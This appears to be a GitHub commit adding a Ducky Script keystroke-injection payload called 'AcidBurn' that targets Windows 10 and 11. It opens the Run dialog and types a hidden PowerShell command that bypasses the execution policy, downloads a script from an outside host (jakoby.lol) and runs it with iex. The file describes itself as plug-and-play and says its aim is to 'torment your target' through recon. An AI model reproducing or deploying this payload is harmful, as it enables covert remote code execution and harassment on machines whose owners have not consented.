Add files via upload
This commit is contained in:
parent
0c0b029e86
commit
25fcf460e5
77 changed files with 6590 additions and 0 deletions
16
Payloads/AcidBurn/AcidBurn.txt
Normal file
16
Payloads/AcidBurn/AcidBurn.txt
Normal file
|
@ -0,0 +1,16 @@
|
|||
REM Title: AcidBurn
|
||||
|
||||
REM Author: I am Jakoby
|
||||
|
||||
REM Description: This payload is meant to torment your target to the fullest extent. Mission to recon then roast. See README.md for more details
|
||||
|
||||
REM Target: Windows 10, 11
|
||||
|
||||
REM --------------------------------------------------------------------------------------
|
||||
REM THIS PAYLOAD IS PLUG AND PLAY. NO MODIFICATIONS NEEDED SIMPLY RUN THE CODE DOWN BELOW.
|
||||
REM --------------------------------------------------------------------------------------
|
||||
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING powershell -w h -NoP -NonI -Ep Bypass irm https://jakoby.lol/zyg | iex
|
||||
ENTER
|
Loading…
Add table
Add a link
Reference in a new issue